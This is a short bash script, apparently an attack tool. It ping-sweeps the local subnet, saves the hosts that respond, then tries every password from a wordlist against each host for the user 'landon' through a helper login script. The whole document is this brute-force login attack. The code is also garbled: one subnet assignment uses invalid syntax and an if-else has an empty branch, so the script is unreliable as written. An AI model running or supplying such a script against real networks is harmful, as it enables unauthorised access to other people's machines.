#!/bin/bash
rm "localips.txt"
if [ -f all.txt ]; then
	IP=$( ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1' )
	SUBNET=${IP%.*}
	SUBNET=${*.%}
	for OCTET in `seq 2 253`; do ping -c 1 -W 1 $SUBNET.$OCTET | tr \\n ' ' | awk '/1 received/ {print $2 >> "localips.txt"}' ; done
else
	
fi

theips=( `cat "localips.txt" `)
passdapass=( `cat "passwdlist.txt" `)
for SERVER in "${theips[@]}"
do
	for PASS in "${passdapass[@]}"
	do
		bash thelinuxlogin landon $PASS $SERVER
	done
done
exit 0
